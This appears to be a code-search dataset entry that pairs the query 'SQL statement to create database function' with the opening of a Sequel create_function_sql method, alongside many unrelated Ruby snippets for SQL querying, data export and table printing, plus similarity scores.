@all_cols.each do |field|\n # puts field.colname\n rel_alias = field.relalias\n stats.each do |stat, info|\n # SELECT\n # UNNEST(ARRAY['address_id_max','address_id_min']) AS key,\n # UNNEST(ARRAY[max(address_id),min(address_id)]) AS value\n # FROM address\n # only add N(umeric) and D(ate) type fields\n if %w(N D).include? field.typcategory\n keyList << \"'#{field.relname}_#{field.colname}_#{stat}'\"\n value = info[:func].gsub('$COLUMN',\"result.#{field.relname}_#{field.colname}\")\n # if info[:type] == 'text'\n value = \"#{value}::text\"\n # end\n valueList << value\n # valueList << \"#{stat}(result.#{field.relname}_#{field.colname})::text\"\n end\n end\n selectList << \"#{rel_alias}.#{field.colname} as #{field.relname}_#{field.colname} \"\n\n # construnct pk join cond\n if pkArray.include?(field.colname)\n pkJoinList << \"#{@table}.#{field.colname} = #{rel_alias}.#{field.colname}\"\n end\n end\n\n # # remove the where clause in query and replace targetList\n whereClauseReplacement = []\n selectQuery = ReverseParseTree.reverseAndreplace(parseTree, selectList.join(','), whereClauseReplacement)\n resultQuery = %(with result as (#{selectQuery} join #{@table} on #{pkJoinList.join(' AND ')}))\n newTargetList = \"UNNEST(ARRAY[#{keyList.join(',')}]) AS key, UNNEST(ARRAY[#{valueList.join(',')}]) as value\"\n\n newQuery = %(#{resultQuery} SELECT #{newTargetList} FROM result)\n query = %(INSERT INTO #{tblName} #{newQuery})\n # puts query\n DBConn.exec(query)\n end",
"def generate_query\n unless databases.nil?\n databases.each do |db|\n create_query[db] = [\"create table #{tablename} (\"]\n end\n csv_column_datatypes.each do |header, datatype|\n append_to_query = build_query_for_datatype(header, datatype)\n append_to_query.each do |key, value|\n create_query[key].push(value)\n end\n end\n prepare_sql_statements\n prepare_import_csv\n # Pass the prepared statements to options varaible.\n # Which gets passed on to print_metadata_analysis\n options[:create_query] = create_query\n options[:import_query] = import_query\n end\n print_metadata_analysis\n end",
"def dump_insert_multi(io, table_obj, rows)\n debug \"Inserting #{rows.length} into #{table_obj.name}.\"\n sqls = @export_db.insert_multi(\n table_obj.name,\n rows,\n replace_line_breaks: true,\n return_sql: true,\n keys: @keys\n )\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n\n rows.clear\n\n # Ensure garbage collection or we might start using A LOT of memory.\n GC.start\n end",
"def select_table_options_sql(sql)\n sql << \" WITH #{@opts[:table_options]}\" if @opts[:table_options]\n end",
"def simple_table(hash, opts = {})\n SimpleTable.new(hash, opts).to_s\n end",
"def _table; @table end",
"def export_table_data(table, min_id=false, max_id=false)\n unless min_id && max_id && table.chunks > 0\n output \"Exporting all data\", table\n rows_exported = query(table.sql_export_all)\n output \"#{rows_exported} rows exported\", table\n return rows_exported\n end\n \n output \"Exporting data for ID range #{min_id}..#{max_id}\", table\n lock = Mutex.new\n rows_exported = 0\n chunks_completed = 0\n \n (min_id..max_id).in_chunks(table.chunks) do |min, max|\n attempts = 0\n begin\n sql = table.sql_export_range(min, max)\n result = query sql\n lock.synchronize do\n rows_exported += result\n chunks_completed += 1\n percent_finished = 100 * chunks_completed / table.chunks\n output(\"Export #{percent_finished}% complete.\", table) if table.chunks >= 40 && chunks_completed % 20 == 0\n end\n rescue => ex\n if attempts >= 10\n output \"EXPORT ERROR: #{ex.message}, chunk #{min}-#{max}, giving up\", table\n raise\n end\n attempts += 1\n output \"EXPORT ERROR: #{ex.message}, chunk #{min}-#{max}, attempt #{attempts}, re-trying after delay\", table\n ssh_cmd(\"rm -f \" + table.export_file_path(min, max))\n sleep(1.0 * attempts)\n retry\n end\n end\n output \"#{rows_exported} rows exported\", table\n rows_exported\n end",
"def drawToSTDOUT\n for r in (0..6).step(3) do\n print \"+-----++-----++-----+\\n\"\n print \"| \\\\\"+@table[r].getTop.to_s+\"/ || \\\\\"+@table[r+1].getTop.to_s+\"/ || \\\\\"+@table[r+2].getTop.to_s+\"/ |\\n\"\n print \"|\"+@table[r].getLeft.to_s+\" × \"+@table[r+1].getRight.to_s+\"||\"+@table[r+2].getLeft.to_s+\" × \"+@table[r].getRight.to_s+\"||\"+@table[r+1].getLeft.to_s+\" × \"+@table[r+2].getRight.to_s+\"|\\n\"\n print \"| /\"+@table[r].getBottom.to_s+\"\\\\ || /\"+@table[r+1].getBottom.to_s+\"\\\\ || /\"+@table[r+2].getBottom.to_s+\"\\\\ |\\n\"\n print \"+-----++-----++-----+\\n\"\n end\n end",
"def display_food_log(db)\n food_data = db.execute(\"SELECT * FROM food_log\")\n food_data.each do |macros|\n puts \"On #{macros['date']} you ate #{macros['total_calories']} calories, #{macros['total_fat']} grams of fat, #{macros['total_carbs']} #{macros['total_carbs']} grams of carbohydrates, and #{macros['total_protein']} grams of protein.\"\n end\n\nend",
"def csv_to_stdout(rows, cols: nil)\n CSV($stdout) { csv_write0(_1, rows, cols:) }\n end",
"def print_table(columns, data, print_headings = true)\n\n # Fill base lengths\n columns.each do |col|\n col[:length] = (print_headings ? col[:title].length : 0)\n end\n\n # Compute maximum length of each field\n data.each do |datum|\n\n columns.each do |col|\n if (col[:func] != nil)\n str = col[:func].call(datum).to_s\n else\n str = datum[col[:key]].to_s\n end\n str = str.gsub(/\\e\\[[0-9;]*m/, '') # eliminate \"colors\"\n col[:length] = [ col[:length], str.length ].max\n end\n\n end\n\n # Create the format string\n table_format_row = '|'\n columns.each do |col|\n if (col[:type] == :int)\n table_format_row << sprintf(\" %%%dd |\", col[:length])\n else\n table_format_row << sprintf(\" %%-%ds |\", col[:length])\n end\n end\n table_format_row << \"\\n\"\n\n # Special line: title\n table_format_title = \"\\e[1m\\e[4m\" +\n table_format_row.gsub(/%-?([0-9]+)[a-z]/, '%-\\1s').gsub(/\\|/, ' ') + \"\\e[m\"\n\n # Create the horizontal line\n table_horizontal = '+'\n columns.each do |col|\n table_horizontal << '-' * (col[:length]+2) << '+'\n end\n\n # Print table\n if (print_headings)\n titles = []\n columns.each do |col|\n titles << col[:title]\n end\n #puts table_horizontal\n printf(table_format_title, *titles);\n else\n puts table_horizontal\n end\n\n data.each do |datum|\n cols_ary = []\n columns.each do |col|\n if (col[:func])\n cols_ary << col[:func].call(datum)\n else\n cols_ary << datum[col[:key]]\n end\n end\n printf(table_format_row, *cols_ary)\n #puts table_horizontal\n end\n puts table_horizontal\n\nend",
"def EXCEL_TABLE(objects, *arguments)\n DebugTable.new(objects, arguments, :tsv)\n end",
"def db_query__show_tables__count\n db_query_transform__count db_query__show_tables\n end",
"def table(table, stream)\n return if already_dumped?(table)\n\n new_stream = StringIO.new\n super(table, new_stream)\n string = new_stream.string\n\n if (parent_table = @connection.parent_table(table))\n table(parent_table, stream)\n string = inject_inherits_for_create_table(string, table, parent_table)\n string = remove_parent_table_columns(string, @connection.columns(parent_table))\n\n pindexes = Hash[@connection.indexes(parent_table).map { |index| [index.columns, index] }]\n cindexes = Hash[@connection.indexes(table).map { |index| [index.columns, index] }]\n\n string = remove_parent_table_indexes(string, (pindexes & cindexes).values)\n end\n\n # We've done this table\n dumped_tables << table\n\n stream.write string\n stream\n end",
"def table_csv_string(options = {})\n opt = {\n :klass => nil,\n :header_row => true\n }.merge!(options)\n str = ''\n \n return false if !opt[:klass]\n\n klass_name = opt[:klass].name\n tbl = ActiveSupport::Inflector.tableize(opt[:klass].name.to_s)\n\n cols = []\n sql = ''\n\n if klass_name == \"Person\" \n cols = %w(id last_name first_name middle_name login)\n else\n cols = opt[:klass].columns.map(&:name) \n end\n\n cols_str = cols.join(\", \")\n\n case opt[:klass].name\n when \"Person\"\n sql = \"SELECT #{cols_str} FROM people p INNER JOIN people_projs pp on p.id = pp.person_id WHERE pp.proj_id = #{self.id};\"\n when \"Ref\"\n cols_str = cols.collect{|c| \"r.#{c}\"}.join(\", \") # refs shared across projects, be more explicit for the join table\n sql = \"SELECT #{cols_str} FROM refs r INNER JOIN projs_refs pr on r.id = pr.ref_id WHERE pr.proj_id = #{self.id};\"\n when \"TaxonName\"\n sql = \"SELECT #{cols_str} FROM taxon_names WHERE #{self.sql_for_taxon_names}\"\n when \"Author\"\n sql = \"SELECT #{cols_str} FROM authors a WHERE a.ref_id IN (SELECT r.id FROM refs r INNER JOIN projs_refs pr on r.id = pr.ref_id WHERE pr.proj_id = #{self.id})\"\n when \"ChrState\"\n sql = \"SELECT #{cols_str} FROM chr_states cs WHERE cs.chr_id IN (SELECT chrs.id from chrs WHERE chrs.proj_id = #{self.id})\" \n # when \"Identifier\"\n # sql = \"SELECT #{cols_str} FROM identifiers si WHERE si.specimen_id IN (SELECT specimens.id from specimens WHERE specimens.proj_id = #{self.id})\"\n when \"SpecimenDetermination\"\n sql = \"SELECT #{cols_str} FROM specimen_determinations sd WHERE sd.specimen_id IN (SELECT specimens.id from specimens WHERE specimens.proj_id = #{self.id})\"\n\n else\n sql = \"SELECT #{cols_str} FROM #{tbl}\" \n end\n\n # add the project level restrictions if they exist\n sql << \" WHERE proj_id = #{self.id}\" if opt[:klass].columns.collect{|c| c.name}.include?(\"proj_id\")\n\n # build the str\n str << cols.join(\"\\t\") if opt[:header_row]# the header row\n str << \"\\n\"\n\n ActiveRecord::Base.connection.select_rows(sql).each do |row| \n # not filtering for tab characters here, likely should\n str << row.collect{|c| c == nil ? nil : c.gsub(/\\n|\\r\\n|\\r/, '\\n')}.join(\"\\t\") + \"\\n\"\n end\n str\n end",
"def probe\n name_pad = columns.map { |c| c.name.length }.max + 1\n type_pad = columns.map { |c| c.type.length }.max + 2\n sql_type_pad = columns.map { |c| c.sql_type.length }.max + 1\n\n columns.sort { |a, b| a.name <=> b.name }.map do |column|\n name = column.name\n name = \"* #{name}\" if primary_key_column?(column)\n print yellow(name.to_s.rjust(name_pad))\n print \" \"\n print blue(column.type.to_s.ljust(type_pad, \".\"))\n print magenta(column.sql_type.to_s.ljust(sql_type_pad))\n column.null ? print(red(\"NULL\")) : print(\" \")\n print \" [#{column.default}]\" if column.default\n print \" #{gray column.comment}\" if column.comment\n puts\n end\n nil\n end",
"def table(enum, opts=OPTS)\n t = Table.new(opts)\n enum.each do |row|\n row = yield(row, t) if block_given?\n t << row\n end\n t.to_s\n end",
"def info_sql\n INFO_SQL\n end",
"def mssql_print_reply(info)\n\n\t\tprint_status(\"SQL Query: #{info[:sql]}\")\n\n\t\tif(info[:done] and info[:done][:rows].to_i > 0)\n\t\t\tprint_status(\"Row Count: #{info[:done][:rows]} (Status: #{info[:done][:status]} Command: #{info[:done][:cmd]})\")\n\t\tend\n\n\t\tif(info[:errors] and not info[:errors].empty?)\n\t\t\tinfo[:errors].each do |err|\n\t\t\t\tprint_error(err)\n\t\t\tend\n\t\tend\n\n\t\tif(info[:rows] and not info[:rows].empty?)\n\n\t\t\ttbl = Rex::Ui::Text::Table.new(\n\t\t\t\t'Indent' => 1,\n\t\t\t\t'Header' => \"\",\n\t\t\t\t'Columns' => info[:colnames]\n\t\t\t)\n\n\t\t\tinfo[:rows].each do |row|\n\t\t\t\ttbl << row\n\t\t\tend\n\n\t\t\tprint_line(tbl.to_s)\n\t\tend\n\tend",
"def display_query_sql(users)\n tag.p('SQL:') + tag.code(users.to_sql)\n end",
"def report_table(output, amount = 10, options = {}, &block)\n \n output.title(options[:title])\n \n top_categories = @categories.sort { |a, b| yield(b[1]) <=> yield(a[1]) }.slice(0...amount)\n output.table({:title => 'Category', :width => :rest}, \n {:title => 'Hits', :align => :right, :highlight => (options[:sort] == :hits), :min_width => 4}, \n {:title => 'Cumulative', :align => :right, :highlight => (options[:sort] == :cumulative), :min_width => 10}, \n {:title => 'Average', :align => :right, :highlight => (options[:sort] == :average), :min_width => 8},\n {:title => 'Min', :align => :right, :highlight => (options[:sort] == :min)}, \n {:title => 'Max', :align => :right, :highlight => (options[:sort] == :max)}) do |rows|\n \n top_categories.each do |(cat, info)|\n rows << [cat, info[:hits], \"%0.02fs\" % info[:cumulative], \"%0.02fs\" % (info[:cumulative] / info[:hits]),\n \"%0.02fs\" % info[:min], \"%0.02fs\" % info[:max]]\n end \n end\n\n end",
"def print_sqlite(filename)\n return to_enum(:print_sqlite, filename) unless block_given?\n depends gems: [\"sequel\", \"sqlite3\"]\n\n require 'sequel'\n require 'pp'\n\n Sequel.sqlite(filename) do |db|\n db.tables.each do |table|\n yield print_header(\"#{table}\", 1)\n schemas = db[:sqlite_master].where(tbl_name: \"#{table}\").select(:sql).map(&:values).flatten.join(\"\\n\")\n yield CodeRay.scan(schemas, :sql).term\n yield \"\"\n begin\n db[table].each { |row| yield CodeRay.scan(row.pretty_inspect, :ruby).term }\n rescue Sequel::DatabaseError => e\n yield e.inspect\n end\n yield \"\"\n yield \"\"\n end\n end\nend",
"def print_table\n\t$table.each do |row|\n\t\trow.each_with_index do |c, index|\n\t\t\tif index != 0\n\t\t\t\tprint ' '\n\t\t\tend\n\t\t\tprint c\n\t\tend\n\t\tprint \"\\n\"\n\tend\nend",
"def _exec_select\n result = []\n csv = CSV.parse(File.read(@table_name), headers: true)\n if @join_flag != 1\n _parse_when_not_join(result, csv)\n else\n _parse_when_join(result, csv)\n end\n if @order_flag == 1\n result = _parse_order(result)\n end\n p result\n end",
"def tinhhinh(tenant)\n \tsql = <<-eos \n select row_number() OVER(ORDER BY t.ten, t.ho_dem, t.ho) as \"stt\", t.\"msv\",\nconcat(t.\"ho\" ,' ', t.ho_dem,' ', t.ten) as \"hovaten\", to_char(t.ngay_sinh,'DD/MM/YYYY' ) as \"ngaysinh\",\ncase when t.\"T1\"=0 then NULL else t.\"T1\" end as \"T1\", case when t.\"T2\"=0 then NULL else t.\"T2\" end as \"T2\", \ncase when t.\"T3\"=0 then NULL else t.\"T3\" end as \"T3\", case when t.\"T4\"=0 then NULL else t.\"T4\" end as \"T4\",\ncase when t.\"T5\"=0 then NULL else t.\"T5\" end as \"T5\", case when t.\"T6\"=0 then NULL else t.\"T6\" end as \"T6\", \ncase when t.\"T7\"=0 then NULL else t.\"T7\" end as \"T7\", case when t.\"T8\"=0 then NULL else t.\"T8\" end as \"T8\", \ncase when t.\"T9\"=0 then NULL else t.\"T9\" end as \"T9\", case when t.\"T10\"=0 then NULL else t.\"T10\" end as \"T10\", \ncase when t.\"T11\"=0 then NULL else t.\"T11\" end as \"T11\", case when t.\"T12\"=0 then NULL else t.\"T12\" end as \"T12\",\ncase when t.\"T13\"=0 then NULL else t.\"T13\" end as \"T13\", case when t.\"T14\"=0 then NULL else t.\"T14\" end as \"T14\",\ncase when t.\"T15\"=0 then NULL else t.\"T15\" end as \"T15\", case when t.\"T16\"=0 then NULL else t.\"T16\" end as \"T16\",\nCOALESCE(\"T1\",0) + COALESCE(\"T2\",0)+ COALESCE(\"T3\",0)+ COALESCE(\"T4\",0)\n + COALESCE(\"T5\",0)+ COALESCE(\"T6\",0)+ COALESCE(\"T7\",0)+ COALESCE(\"T8\",0)+ COALESCE(\"T9\",0)+ COALESCE(\"T10\",0)\n + COALESCE(\"T11\",0)+ COALESCE(\"T12\",0)+ COALESCE(\"T13\",0)+ COALESCE(\"T14\",0)+ COALESCE(\"T15\",0)\n + COALESCE(\"T16\",0) as tonggiovang, t.diemchuyencan, t.diemthuchanh,\n t.lan1 as lan1, t.lan2 as lan2, t.lan3 as lan3, round(t.diemgoctbkt, 2) as diemgoctbkt, t.diemtbkt, case when t.diemchuyencan=0 then 0 else t.diemquatrinh end as diemquatrinh,\n t.note as note\n from \n(SELECT \"msv\", sv1.ho, sv1.ho_dem, sv1.ten, sv1.ngay_sinh , \"T1\", \"T2\", \"T3\", \"T4\", \"T5\", \"T6\", \"T7\", \"T8\", \"T9\", \"T10\", \"T11\",\n \"T12\", \"T13\", \"T14\", \"T15\", \"T16\", COALESCE(\"T1\",0) + COALESCE(\"T2\",0)+ COALESCE(\"T3\",0)+ COALESCE(\"T4\",0)\n + COALESCE(\"T5\",0)+ COALESCE(\"T6\",0)+ COALESCE(\"T7\",0)+ COALESCE(\"T8\",0)+ COALESCE(\"T9\",0)+ COALESCE(\"T10\",0)\n + COALESCE(\"T11\",0)+ COALESCE(\"T12\",0)+ COALESCE(\"T13\",0)+ COALESCE(\"T14\",0)+ COALESCE(\"T15\",0)\n + COALESCE(\"T16\",0) as tonggiovang, sv1.diem_chuyen_can as diemchuyencan, sv1.diem_thuc_hanh as diemthuchanh,\n sv1.lan1 as lan1, sv1.lan2 as lan2, sv1.lan3 as lan3, sv1.diem_goc_tbkt as diemgoctbkt, sv1.diem_tbkt as diemtbkt, sv1.diem_qua_trinh as diemquatrinh,\n sv1.note as note\n FROM crosstab(\n 'select dd.ma_sinh_vien, l.tuan, sum(CASE WHEN phep THEN 0 ELSE so_tiet_vang END ) as so_vang\n from t1.diem_danhs dd\n inner join t1.lich_trinh_giang_days l on l.id = dd.lich_trinh_giang_day_id\n where l.lop_mon_hoc_id = #{object.id}\n and dd.so_tiet_vang > 0\n group by ma_sinh_vien, tuan\n order by 1,2',\n 'select m from generate_series(1,16) m')\n AS (\"msv\" text, \"T1\" int, \"T2\" int, \"T3\" int, \"T4\" int, \"T5\" int, \"T6\" int, \"T7\" int, \"T8\" int, \"T9\" int, \"T10\" int\n , \"T11\" int, \"T12\" int, \"T13\" int, \"T14\" int, \"T15\" int, \"T16\" int)\n inner join t1.lop_mon_hoc_sinh_viens sv1 on sv1.ma_sinh_vien = msv and sv1.lop_mon_hoc_id = #{object.id}\n\n union all\n select ma_sinh_vien as \"msv\", ho, ho_dem, ten, ngay_sinh, 0 as \"T1\", 0 as \"T2\", \n 0 as \"T3\", 0 as \"T4\", 0 as \"T5\", 0 as \"T6\", \n0 as \"T7\", 0 as \"T8\", 0 as \"T9\", 0 as \"T10\", 0 as \"T11\", 0 as \"T12\", 
\n0 as \"T13\", 0 as \"T14\", 0 as \"T15\", 0 as \"T16\", 0 as tongiovang , diem_chuyen_can , diem_thuc_hanh as diemthuchanh,\nlan1, lan2, lan3, diem_goc_tbkt as diemgoctbkt, diem_tbkt as diemtbkt, diem_qua_trinh as diemquatrinh, note as note\nfrom t1.lop_mon_hoc_sinh_viens where (status is NULL or status != true) and lop_mon_hoc_id=#{object.id} and ma_sinh_vien not in (select dd.ma_sinh_vien\n from t1.diem_danhs dd\n inner join t1.lich_trinh_giang_days l on l.id = dd.lich_trinh_giang_day_id\n where l.lop_mon_hoc_id = #{object.id}\n and dd.so_tiet_vang > 0)\n ) as t\n order by t.ten, t.ho_dem, t.ho, t.ngay_sinh\n eos\n @res = ActiveRecord::Base.connection.execute(sql) \n \n pdf = Prawn::Document.new(:page_layout => :landscape, \n :page_size => 'A4', :margin => 20)\n #pdf.font \"#{Rails.root}/app/assets/fonts/arial.ttf\"\n pdf.font_families.update(\n 'Arial' => { :normal => Rails.root.join('app/assets/fonts/arial2.ttf').to_s,\n :bold => Rails.root.join('app/assets/fonts/arialbd.ttf').to_s,\n :italic => Rails.root.join('app/assets/fonts/arialbi.ttf').to_s} \n )\n \n cell_width = 40\n row_height = 120\n img_path = \"#{Rails.root}/public/images/logo.png\"\n pieces = [[img_path, \"\"]]\n pieces.each do |p|\n #pdf.move_down 5 # a bit of padding\n cursor = pdf.cursor \n p.each_with_index do |v,j|\n pdf.bounding_box [cell_width*j, cursor], :height => 80, :width => ( j == 0 ? cell_width : 780) do\n if j == 0\n pdf.image v, :width => 40\n else \n pdf.font \"Arial\"\n t1 = pdf.make_table [[\"BỘ GIÁO DỤC VÀ ĐÀO TẠO\"],[\"TRƯỜNG ĐẠI HỌC DÂN LẬP HẢI PHÒNG\"],[\"\"],[\"\"]], :width => 260, :cell_style => {:align => :center, :valign => :center, :size => 10, :height => 20, :borders => []}\n t2 = pdf.make_table [[\" BẢNG THEO DÕI TÌNH HÌNH MÔN HỌC\"]], :width => 480, :cell_style => {:valign => :center, :size => 10, :font_style => :bold, :height => 20, :borders => []} do \n row(0).columns(0).padding_left = 40\n end\n t3 = pdf.make_table [\n [\"Môn học: #{object.ten_mon_hoc}\",\"\", \"Tổng số tiết:.....\"],\n [\"Giáo viên phụ trách: #{object.ten_giang_vien}\",\"\", \"Lý thuyết:.....\"],\n [\"Lớp: #{object.ma_lop} Kỳ: #{tenant.hoc_ky} Năm học: #{tenant.nam_hoc}\",\"\", \"Thực hành, thí nghiệm:.....\"]\n ], :cell_style => {:size => 9, :height => 20, :borders => []}, :width => 480, :column_widths => { 0 => 210, 1 => 100, 2 => 170} do \n row(0).columns(0).font_style = :bold\n end \n\n t4 = pdf.make_table [[t2], [t3]], :cell_style => {:borders => []}\n t0 = pdf.make_table [[\"\"]], :width => 20, :cell_style => {:borders => []}\n pdf.table [ \n [ \n t0,\n t1,\n t0, \n t4 \n ]\n ] , :cell_style => {:borders => []}\n end\n end\n end\n end\n pdf.move_down(5)\n @res = @res.to_a\n m = @res.each_slice(19).to_a if @res.count <= 19\n if @res.count > 19\n m1 = @res[0..18]\n m2 = @res[19..-1].each_slice(23).to_a\n m = m2.unshift(m1)\n end\n page_count = m.count\n m.each_with_index do |m1, index|\n pdf.font \"Arial\" \n items1 = m1.map {|i| [i[\"stt\"], i[\"msv\"], i[\"hovaten\"], i[\"ngaysinh\"]]} \n mtable01 = pdf.make_table [[\"Stt\", \"Mã SV\", \"Họ và tên\", \"Ngày sinh\"]], :width => 240, :cell_style => {:align => :center, :valign => :center, :size => 7.5, :height => 50}, :column_widths => {1 => 52, 2 => 115, 3 => 50}\n mtable02 = pdf.make_table items1, :width => 240, :cell_style => {:align => :center, :valign => :center, :size => 7.5, :height => 20}, :column_widths => {1 => 52, 2 => 115, 3 => 50} do \n (0..items1.length).each do |l|\n row(l).columns(2).align = :left\n end\n end\n\n items2 = m1.map {|item| \n 
[item[\"T1\"],item[\"T2\"],item[\"T3\"],item[\"T4\"],item[\"T5\"],item[\"T6\"],item[\"T7\"],item[\"T8\"],item[\"T9\"],item[\"T10\"],item[\"T11\"],item[\"T12\"],item[\"T13\"],item[\"T14\"],item[\"T15\"],item[\"T16\"],\n item[\"tonggiovang\"], item[\"diemchuyencan\"]]}\n items3 = @res.map {|item| [item[\"lan1\"], item[\"lan2\"], item[\"lan3\"], item[\"diemtbkt\"]]} \n mytable0 = pdf.make_table [[\"Điểm danh\"]], :width => 370, :cell_style => {:align => :center, :valign => :center, :size => 7.5, :height => 20, :font_style => :bold}\n mytable01 = pdf.make_table [[\"T1\",\"T2\",\"T3\",\"T4\",\"T5\",\"T6\",\"T7\",\"T8\",\"T9\",\"T10\",\"T11\",\"T12\",\"T13\",\"T14\",\"T15\",\"T16\",\"Tổng giờ vắng\", \"Điểm chuyên cần\"]] + items2, :width => 370, :cell_style => {:align => :center, :valign => :center, :size => 7, :height => 20}, :header => true do \n (0..items2.length).each do |l| \n row(l).columns(16).width = 25\n row(l).columns(17).width = 25\n end\n row(0).columns(16).size = 5\n row(0).columns(17).size = 5 \n (0..17).each do |t|\n row(0).columns(t).height = 30 \n end\n\n end\n\n items3 = m1.map {|i| [i[\"diemthuchanh\"]]} \n mtable11 = pdf.make_table [[\"Điểm TH, TN, BTL, ĐA\"]] + items3, :width => 22, :cell_style => {:align => :center, :valign => :center, :size => 7, :height => 20} do \n row(0).columns(0).height = 50\n row(0).columns(0).size = 5 \n end\n\n items4 = m1.map {|i| [i[\"lan1\"], i[\"lan2\"], i[\"lan3\"], i[\"diemgoctbkt\"], i[\"diemtbkt\"]]}\n mtable2 = pdf.make_table [[\"Điểm kiểm tra thường xuyên\"]], :width => 110, :cell_style => {:align => :center, :valign => :center, :size => 7.5, :height => 20}\n mtable21 = pdf.make_table [[\"Lần 1\", \"Lần 2\", \"Lần 3\", \"TB Kiểm tra\", \"Quy điểm QT\"]] + items4, :width => 110, :cell_style => {:align => :center, :valign => :center, :size => 7, :height => 20} do \n (0..4).each do |i|\n row(0).columns(i).size = 5\n row(0).columns(i).height = 30\n end\n end\n \n items5 = m1.map {|i| [i[\"diemquatrinh\"], i[\"note\"]]} \n mtable31 = pdf.make_table [[\"Tổng điểm QT\", \"Ghi chú\"]] + items5, :cell_style => {:align => :center, :valign => :center, :size => 7, :height => 20}, :column_widths => {0 => 20, 1 => 39} do \n (0..1).each do |i|\n row(0).columns(i).height = 50\n row(0).columns(i).size = 5 \n end \n row(0).columns(1).size = 7.5\n end\n \n #mytable1 = pdf.make_table [[mytable0],[mytable01]]\n\n #mtable0 = pdf.make_table [[\"Điểm kiểm tra thường xuyên\"]], :width => 80, :cell_style => {:align => :center, :size => 7}\n #mtable01 = pdf.make_table [[\"Lần 1\", \"Lần 2\", \"Lần 3\", \"TB Kiểm tra\"]] + items3, :width => 80, :cell_style => {:align => :center, :size => 7}\n pdf.table [ \n [\n [\n [mtable01],[mtable02]\n ], \n [\n [mytable0],[mytable01]\n ],\n [\n [mtable11]\n ],\n [\n [mtable2],[mtable21]\n ],\n [\n [mtable31]\n ]\n ]\n ] \n #pdf.start_new_page(:margin => 20) unless index == page_count\n end\n pdf.move_down 2\n d = DateTime.now\n \n #pdf.text \"Duyệt #{object.sosvtucach} sinh viên được dự thi kết thúc học phần\", :style => :italic, :size => 8\n pdf.table [[\"Duyệt #{object.sosvtucach} sinh viên được dự thi kết thúc học phần\",\"\",\"\"],[\"\",\"\", \"Hải phòng, ngày #{d.day} tháng #{d.month} năm #{d.year}\"]], :cell_style => {:font_style => :italic, :size => 8, :borders => []}, :column_widths => {0 => 270, 1 => 270, 2 => 260} do \n row(1).columns(2).padding_left = 20\n end\n pdf.move_down 2\n str = \"Ghi chú:\\n- Khi SV vắng đề nghị Thầy, Cô ghi cụ thể số tiết vắng.\\nVí dụ V: có nghĩa SV vắng 3 tiết\\n-Trước khi thi 7 ngày, giáo 
viên dạy môn học nộp bảng theo dõi cho Chủ nhiệm Bộm môn để duyệt tư cách dự thi cho sinh viên.\"\n pdf.table [[str, \"CHỦ NHIỆM BỘ MÔN\",\"GIÁO VIÊN PHỤ TRÁCH MÔN HỌC\"]], :cell_style => {:borders => []}, :column_widths => {0 => 270, 1=> 270, 2 => 260} do \n row(0).columns(0).font_style = :italic\n row(0).columns(0).size = 8\n row(0).columns(1).font_style = :bold\n row(0).columns(1).size = 12\n row(0).columns(2).font_style = :bold\n row(0).columns(2).size = 12\n row(0).columns(1).padding_left = 50\n #row(0).columns(2).padding_left = 0\n end\n pdf.repeat(:all) do \n pdf.draw_text \"QC07-B10\", :at => [10, -10]\n #pdf.stamp \"approved\" \n end\n #items.unshift [\"Stt\",\"Mã SV\",\"Họ và tên\",\"Ngày sinh\",mytable1, \"Điểm TH, TN, BTL, ĐA\", mtable1, \"Tổng điểm QT\", \"Ghi chú\"]\n \n \n return pdf\n \n end",
"def csv_export_rawtable(table_name, data_array, options = {})\n column_definitions = []\n eval(\"#{table_name}.content_columns\").each do |column|\n column_definitions << [column.name, column.name]\n end\n csv_export(column_definitions, data_array, options)\n end",
"def perform_query\n Rails.logger.info queries.to_sql\n queries\n end",
"def format_output_without_CSV\r\n\t\theadings = [] << \"Run\"\r\n\t\trows = []\r\n\t\t@parameters.each_with_index {|p,i| headings << \"F#{i+1}\"}\r\n\t\t@runs.each_with_index {|r,i| temp = [\"#{i+1}\"]; temp += r; rows << temp}\r\n\t\t@output_table = Terminal::Table.new :title => \"IPO Algorithm tests output\", :headings => headings, :rows => rows\r\n\tend",
"def table(opts = { print: true })\n require \"inspec/ui_table_helper\"\n\n the_table = TableHelper.new\n yield(the_table)\n\n colorizer = proc do |data, row, _col|\n if color? && row == 0\n ANSI_CODES[:bold] + ANSI_CODES[:color][:white] + data.to_s + ANSI_CODES[:reset]\n else\n data\n end\n end\n render_mode = color? ? :unicode : :ascii\n padding = [0, 1, 0, 1] # T R B L\n result = the_table.render(render_mode, filter: colorizer, padding: padding) + \"\\n\"\n print_or_return(result, opts[:print])\n end"
] |
[
"0.66475284",
"0.6606472",
"0.65019464",
"0.63997036",
"0.6392478",
"0.63616675",
"0.62400645",
"0.62208533",
"0.61771643",
"0.61625415",
"0.6158442",
"0.6136209",
"0.6056827",
"0.6039973",
"0.6032121",
"0.58631384",
"0.58205557",
"0.5808749",
"0.5798774",
"0.5790676",
"0.5790676",
"0.5790676",
"0.5790676",
"0.5775653",
"0.5745019",
"0.5735132",
"0.5695256",
"0.5684484",
"0.56601346",
"0.5659827",
"0.5654196",
"0.56307334",
"0.5623389",
"0.5592575",
"0.55723566",
"0.55706954",
"0.55627024",
"0.55618626",
"0.55503356",
"0.5533816",
"0.553336",
"0.5509686",
"0.54812",
"0.5471983",
"0.5457653",
"0.5451937",
"0.54334354",
"0.542543",
"0.5423814",
"0.5416426",
"0.5403393",
"0.53946525",
"0.5388767",
"0.5378842",
"0.5374175",
"0.5369464",
"0.53646994",
"0.53566927",
"0.53474736",
"0.5342925",
"0.53275424",
"0.5322068",
"0.53195715",
"0.5314724",
"0.53140205",
"0.5307953",
"0.5300674",
"0.5299183",
"0.5299183",
"0.5299183",
"0.5287995",
"0.5281602",
"0.5276677",
"0.52743137",
"0.5269856",
"0.5264236",
"0.52633405",
"0.5262323",
"0.5255205",
"0.5238439",
"0.5232062",
"0.5227304",
"0.522695",
"0.52246934",
"0.52235967",
"0.5222492",
"0.52116615",
"0.5208052",
"0.52064264",
"0.5206319",
"0.52038133",
"0.52015644",
"0.51974297",
"0.51856387",
"0.5185005",
"0.5182303",
"0.51772857",
"0.51739097",
"0.5171716",
"0.5167382"
] |
0.5837525
|
16
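(The rank above is consistent with the descending negative_scores list. As a minimal Ruby sketch, with variable names assumed and not part of the dataset, it can be recomputed by counting the negatives that outscore the document:

    document_rank = negative_scores.count { |s| s.to_f > document_score } # => 16
)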
|
SQL statement to create database function.
|
def create_function_sql(name, definition, opts=OPTS)
args = opts[:args]
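          # The RETURNS clause is skipped when any argument is given as a
          # 3-element [name, type, mode] array with an OUT/INOUT mode, since
          # PostgreSQL then derives the return type from those arguments.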
